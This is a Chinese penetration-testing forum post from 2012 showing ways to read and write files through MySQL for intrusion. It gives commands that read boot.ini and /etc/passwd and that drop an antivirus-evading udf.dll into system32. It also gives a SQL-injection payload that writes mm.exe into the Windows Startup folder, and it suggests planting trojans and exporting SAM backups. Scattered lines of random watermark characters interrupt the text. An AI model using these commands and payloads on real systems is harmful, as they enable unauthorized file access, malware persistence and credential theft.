中国网络渗透测试联盟
标题:
mysql下读取文件的几种方式
[打印本页]
作者:
admin
时间:
2012-9-13 16:34
标题:
mysql下读取文件的几种方式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。
& o1 K# } T) ^' y0 [0 {* B
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
( A U& V4 s) ^
) ]4 j$ e* I P; Z5 ~. F% G9 f* j2 S
mysql3.x下
/ Z5 P7 K/ W' m# h+ b/ F) H% C" A g
2 z2 U$ n* E/ ?. U/ `9 F! E
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下
* {0 }, ]( N) G
8 E; k* }6 U% {9 @! U
mysql>create table a (cmd text);
4 f* g& q) ?4 W6 c
mysql>load data infile 'c:\\boot.ini' into table a;
8 A3 R* @ ^% l% p8 z
mysql>select * from a;
6 u; ~! W: v* `& j
' m( X& J+ F% P% F; b* w2 L
mysql4.x下
7 s1 m$ f* M' C8 @: ^, }, ]6 p3 e
) p9 C4 u7 n( B, N a6 z
mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下
* T7 B6 \' s6 t% M2 q
& I5 l; [; d5 @/ }
mysql>create table a (cmd text);
1 h) f) g& w& b1 a
mysql>insert into a (cmd) values (load_file('c:\\boot.ini'));
; [' d/ G) H; ]: N% }7 L Z
mysql>select * from a;
. z0 P1 R- p2 y, \% F/ Y- V. g
5 F; Z' |# a4 P. G1 R: b$ S
mysql5.x下
( F: X! f$ ]7 Y& b. R0 |
9 ?5 _: x2 d- t2 W6 M
在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下
+ I9 g4 t. c8 u0 N. F/ W; K
. l6 c" }6 C; E& V* s
mysql>system cat /etc/passwd
M8 E1 @8 d1 R# I% b. c+ B
; F2 x+ M9 G5 r! W0 V$ z5 u" u
$ E! K; O0 I/ Y5 v2 {! g
mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。
7 G/ s0 i) R5 v) g2 D4 l. m% |- O
9 _, }0 U" u3 s, |
, ?- ] |, x# l( \% {6 F
例:把免杀过的udf.dll文件插入系统目录
# R# Q- d; k/ Q. ?9 V
6 O7 z. j1 o) U5 U7 o: W: v
create table a (cmd LONGBLOB);
) e' |) R6 R1 u6 l( U" s
insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));
& P7 X) j- k, f- T
SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
4 k5 w+ c2 d5 v- p+ P% [
3 C* E( K) J3 i& [5 r
其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。
$ A( v% M9 Y( M6 f/ G
7 d! ]6 s/ k D) N& q7 v* M6 d& a
: S+ E- ~ L. k0 {* N
注入中的语法(未测试)
! r6 p; I! X' k, X! z' @& H# B
( i$ ?, s5 w" q% m. Z' I8 I
- w" s/ r- U; I3 j/ y
id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2